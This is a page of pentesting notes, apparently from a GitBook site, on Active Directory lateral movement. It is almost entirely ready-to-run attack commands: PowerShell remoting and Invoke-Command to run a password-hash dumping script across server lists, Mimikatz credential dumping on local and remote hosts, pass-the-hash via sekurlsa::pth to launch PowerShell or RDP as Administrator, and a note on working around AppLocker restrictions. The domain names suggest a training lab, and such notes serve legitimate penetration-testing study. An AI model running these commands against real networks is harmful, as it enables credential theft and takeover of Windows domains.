Wicked Security
  • Likhith Cv
  • Pentesting
    • DevSecOps
    • x86_Shell_Coding
    • Mobile Security
      • iOS
      • Android
    • Docker Basics
      • Docker Breakouts
    • Cloud
      • AWS
  • Active Directory
    • Active Directory
      • Gaining Foothold - Get Passwords
      • Enumeration
      • Lateral Movement
      • Persistance
      • Privilege Escalation
  • How to Take POCs
    • Network
      • Port 123 - NTP
      • SSH
      • Shares SMB, NFS
      • FTP
      • Port 161 - SNMP
      • SMPT
      • CCTV
      • SSL Testing Manual
  • OSINT
    • OSINT - Open Source Intelligence
  • Cheat-Sheet
    • Text Processing Cheat-Sheet
    • Cheat-Sheet Powershell
  • Privilege Escalation
    • Windows
    • Linux
  • Exploits
    • Exploits Links/Binaries
  • Wireless
Powered by GitBook
On this page
  • To Enable Powershell Remoting(Requires Admin)
  • Powershell Remoting
  • StateFull Sessions
  • Invoke-Command
  • Use below to execute locally loaded function on the remote machines
  • Use below to execute "Stateful" commands using Invoke-Command:
  • Mimikatz
  • RDP with NTLM

Was this helpful?

  1. Active Directory
  2. Active Directory

Lateral Movement

To Enable Powershell Remoting(Requires Admin)

Enable-PSRemoting -Force

uses 5985 - http and 5986 for ssl needs local admin rights on target machine

Powershell Remoting

you can use -Credential parameter to pass credentials

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

StateFull Sessions

Invoke-Command

Use below to execute commands or scriptblocks:

• Use below to execute scripts from files Invoke-Command –FilePath C:\Get-PassHashes.ps1 - ComputerName (Get-Content list_of_servers)

if it shows constraint language mode you can only run built-in functions which is caused by applocker policy you can import scripts in you machine and then call the function through invoke-command

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Use below to execute locally loaded function on the remote machines

• In this case, we are passing Arguments. Keep in mind that only positional arguments could be passed this way: Invoke-Command -ScriptBlock ${function:Get-PassHashes} - ComputerName (Get-Content list_of_servers) - ArgumentList

In below, a function call within the script is used Invoke-Command –Filepath C:\Get-PassHashes.ps1 - ComputerName (Get-Content list_of_servers)

Use below to execute "Stateful" commands using Invoke-Command:

$Sess = New-PSSession –Computername Server1
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}

Mimikatz

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2") //dumping on multiple remote machines

"over pass the hash" generate tokens from hashes.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'

RDP with NTLM

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:mstsc.exe restrictedadmin"'

PreviousEnumerationNextPersistance

Last updated 4 years ago

Was this helpful?